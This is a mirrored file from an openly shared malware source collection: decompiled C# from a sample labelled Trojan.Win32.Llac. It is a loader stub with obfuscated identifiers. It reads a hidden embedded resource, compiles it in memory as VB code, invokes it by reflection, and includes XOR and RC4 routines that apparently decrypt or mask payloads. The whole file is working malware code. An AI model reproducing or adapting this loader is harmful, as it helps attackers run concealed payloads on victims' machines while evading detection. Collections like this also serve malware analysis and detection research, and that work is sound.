mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 21:05:28 +00:00
211 lines
9.1 KiB
C#
211 lines
9.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ
|
|||
|
// Assembly: [2010-06-13] CG_QTTask, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 86ADDFF4-806D-4CF9-AAD0-F2BF223801EF
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.aakd-96f6bdd657e1d74f1acd0cbd94cc352ca144d9145acce016b7f711c50bab97f6.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic;
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System;
|
|||
|
using System.CodeDom.Compiler;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
[StandardModule]
|
|||
|
internal sealed class UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ
|
|||
|
{
|
|||
|
private static bool dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq = false;
|
|||
|
|
|||
|
[STAThread]
|
|||
|
public static void Main()
|
|||
|
{
|
|||
|
if (UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq)
|
|||
|
{
|
|||
|
int num = (int) Interaction.MsgBox((object) "eYqnKtFLHSjkGHRoVyOuCUcSxstrwhbiMnYosvmMoUEznJypEO");
|
|||
|
}
|
|||
|
string UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName = "RovDhttJNQIgvoYGJdGKYUERqqSamP";
|
|||
|
UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.rBNoJnMeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJ(UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.MeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlG().Replace("\"__PATH__\"", "\"" + Assembly.GetExecutingAssembly().Location + "\""), UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName);
|
|||
|
}
|
|||
|
|
|||
|
public static string MeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlG()
|
|||
|
{
|
|||
|
Assembly executingAssembly = Assembly.GetExecutingAssembly();
|
|||
|
string manifestResourceName = executingAssembly.GetManifestResourceNames()[0];
|
|||
|
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(manifestResourceName);
|
|||
|
return manifestResourceStream == null ? "" : new StreamReader(manifestResourceStream).ReadToEnd();
|
|||
|
}
|
|||
|
|
|||
|
private static CompilerResults VcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepjCkIrCIEQgvDFOl(
|
|||
|
CompilerParameters gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl,
|
|||
|
string EBYISYUgwxTVeCjNcJPiqgMHHGLvovaBmDGJBZDhRNCWNERbLK)
|
|||
|
{
|
|||
|
CompilerResults compilerResults;
|
|||
|
try
|
|||
|
{
|
|||
|
VBCodeProvider vbCodeProvider = new VBCodeProvider();
|
|||
|
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.GenerateExecutable = false;
|
|||
|
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("System.dll");
|
|||
|
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("System.Windows.Forms.dll");
|
|||
|
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("System.Data.dll");
|
|||
|
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll");
|
|||
|
compilerResults = vbCodeProvider.CompileAssemblyFromSource(gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl, EBYISYUgwxTVeCjNcJPiqgMHHGLvovaBmDGJBZDhRNCWNERbLK);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
Exception exception = ex;
|
|||
|
if (UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq)
|
|||
|
{
|
|||
|
int num = (int) Interaction.MsgBox((object) exception.Message);
|
|||
|
}
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
return compilerResults;
|
|||
|
}
|
|||
|
|
|||
|
private static void rBNoJnMeEepjCkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJ(
|
|||
|
string YWbMFMqEDTXZRqFxiQSmPUhsNaOzbxwYGXJNnOZTliFbzrnyQf,
|
|||
|
string UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName)
|
|||
|
{
|
|||
|
CompilerParameters gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl = new CompilerParameters();
|
|||
|
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.GenerateInMemory = true;
|
|||
|
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.IncludeDebugInformation = false;
|
|||
|
gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl.TreatWarningsAsErrors = false;
|
|||
|
try
|
|||
|
{
|
|||
|
UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.DKbCBRHKCaDigODXNEScLLxxZhuWqVtLXMJDVSpZjplwOPkmvT((object) UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.VcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepjCkIrCIEQgvDFOl(gKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtthhIRdGZFcuHurl, YWbMFMqEDTXZRqFxiQSmPUhsNaOzbxwYGXJNnOZTliFbzrnyQf).CompiledAssembly.GetType(UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZName));
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
ProjectData.SetProjectError(ex);
|
|||
|
Exception exception = ex;
|
|||
|
if (UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.dBIPtGGVZcUsIBkSVpSWkhQdDDemybuaxQpQbVnXtdotqCThpq)
|
|||
|
{
|
|||
|
int num = (int) Interaction.MsgBox((object) exception.Message);
|
|||
|
}
|
|||
|
ProjectData.ClearProjectError();
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static void DKbCBRHKCaDigODXNEScLLxxZhuWqVtLXMJDVSpZjplwOPkmvT(
|
|||
|
object yXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxbdJQjqg)
|
|||
|
{
|
|||
|
BindingFlags bindingFlags1 = BindingFlags.Static | BindingFlags.Public | BindingFlags.InvokeMethod;
|
|||
|
object Instance = yXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxbdJQjqg;
|
|||
|
object[] objArray = new object[5]
|
|||
|
{
|
|||
|
(object) "iOlEdEPJbLhRchepHVdenMGjlSYrzp",
|
|||
|
(object) bindingFlags1,
|
|||
|
(object) null,
|
|||
|
(object) null,
|
|||
|
(object) null
|
|||
|
};
|
|||
|
object[] Arguments = objArray;
|
|||
|
bool[] flagArray = new bool[5]
|
|||
|
{
|
|||
|
false,
|
|||
|
true,
|
|||
|
false,
|
|||
|
false,
|
|||
|
false
|
|||
|
};
|
|||
|
bool[] CopyBack = flagArray;
|
|||
|
NewLateBinding.LateCall(Instance, (Type) null, "InvokeMember", Arguments, (string[]) null, (Type[]) null, CopyBack, true);
|
|||
|
if (!flagArray[1])
|
|||
|
return;
|
|||
|
BindingFlags bindingFlags2 = (BindingFlags) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray[1]), typeof (BindingFlags));
|
|||
|
}
|
|||
|
|
|||
|
public class QtvcvCKyenomrPVcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepj
|
|||
|
{
|
|||
|
public static string YlkBEHyXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxb(
|
|||
|
string DataIn,
|
|||
|
string CodeKey)
|
|||
|
{
|
|||
|
long num = (long) Strings.Len(DataIn);
|
|||
|
long Start = 1;
|
|||
|
string str;
|
|||
|
while (Start <= num)
|
|||
|
{
|
|||
|
string Expression = Conversion.Hex(Strings.Asc(Strings.Mid(DataIn, checked ((int) Start), 1)) ^ Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (Start % (long) Strings.Len(CodeKey)) + 1L)), 1)));
|
|||
|
if (Strings.Len(Expression) == 1)
|
|||
|
Expression = "0" + Expression;
|
|||
|
str += Expression;
|
|||
|
checked { ++Start; }
|
|||
|
}
|
|||
|
return str;
|
|||
|
}
|
|||
|
|
|||
|
public static string CkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtt(
|
|||
|
string DataIn,
|
|||
|
string CodeKey)
|
|||
|
{
|
|||
|
long num1 = checked ((long) Math.Round(unchecked ((double) Strings.Len(DataIn) / 2.0)));
|
|||
|
long num2 = 1;
|
|||
|
string str;
|
|||
|
while (num2 <= num1)
|
|||
|
{
|
|||
|
int num3 = checked ((int) Math.Round(Conversion.Val("&H" + Strings.Mid(DataIn, (int) (2L * num2 - 1L), 2))));
|
|||
|
int num4 = Strings.Asc(Strings.Mid(CodeKey, checked ((int) (unchecked (num2 % (long) Strings.Len(CodeKey)) + 1L)), 1));
|
|||
|
str += Conversions.ToString(Strings.Chr(num3 ^ num4));
|
|||
|
checked { ++num2; }
|
|||
|
}
|
|||
|
return str;
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] YlkBEHyXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxb(
|
|||
|
byte[] Input,
|
|||
|
string Key)
|
|||
|
{
|
|||
|
return UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.QtvcvCKyenomrPVcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepj.Proper_RC4(Input, Encoding.Default.GetBytes(Key));
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] CkIrCIEQgvDFOlgKMsySaPuqqpufmtKkjzpskJmRPwlGwnBLtt(
|
|||
|
byte[] Input,
|
|||
|
string Key)
|
|||
|
{
|
|||
|
return UCFZCGUezNzmOjiLsKvzZzLFXUrNldalDRmajICfhOinvlRaaZ.QtvcvCKyenomrPVcHUTjnphHWOygiDfkyudqQRrBNoJnMeEepj.YlkBEHyXmfPxzUwCPMuIhhJReGZFduVvHBTCYITZVgxNUVfDxb(Input, Key);
|
|||
|
}
|
|||
|
|
|||
|
public static byte[] Proper_RC4(byte[] Input, byte[] Key)
|
|||
|
{
|
|||
|
uint[] numArray1 = new uint[256];
|
|||
|
byte[] numArray2 = new byte[checked (Input.Length - 1 + 1)];
|
|||
|
uint index1 = 0;
|
|||
|
do
|
|||
|
{
|
|||
|
numArray1[checked ((int) index1)] = index1;
|
|||
|
checked { ++index1; }
|
|||
|
}
|
|||
|
while (index1 <= (uint) byte.MaxValue);
|
|||
|
uint index2 = 0;
|
|||
|
do
|
|||
|
{
|
|||
|
uint index3 = checked ((uint) ((long) (index3 + (uint) Key[(int) unchecked ((long) index2 % (long) Key.Length)] + numArray1[(int) index2]) & (long) byte.MaxValue));
|
|||
|
uint num = numArray1[checked ((int) index2)];
|
|||
|
numArray1[checked ((int) index2)] = numArray1[checked ((int) index3)];
|
|||
|
numArray1[checked ((int) index3)] = num;
|
|||
|
checked { ++index2; }
|
|||
|
}
|
|||
|
while (index2 <= (uint) byte.MaxValue);
|
|||
|
uint index4 = 0;
|
|||
|
uint index5 = 0;
|
|||
|
int num1 = checked (numArray2.Length - 1);
|
|||
|
int index6 = 0;
|
|||
|
while (index6 <= num1)
|
|||
|
{
|
|||
|
index4 = checked ((uint) ((long) index4 + 1L & (long) byte.MaxValue));
|
|||
|
index5 = checked ((uint) ((long) (index5 + numArray1[(int) index4]) & (long) byte.MaxValue));
|
|||
|
uint num2 = numArray1[checked ((int) index4)];
|
|||
|
numArray1[checked ((int) index4)] = numArray1[checked ((int) index5)];
|
|||
|
numArray1[checked ((int) index5)] = num2;
|
|||
|
numArray2[index6] = checked ((byte) ((int) Input[index6] ^ unchecked ((int) numArray1[checked ((int) ((long) (numArray1[(int) index4] + numArray1[(int) index5]) & (long) byte.MaxValue))])));
|
|||
|
checked { ++index6; }
|
|||
|
}
|
|||
|
return numArray2;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|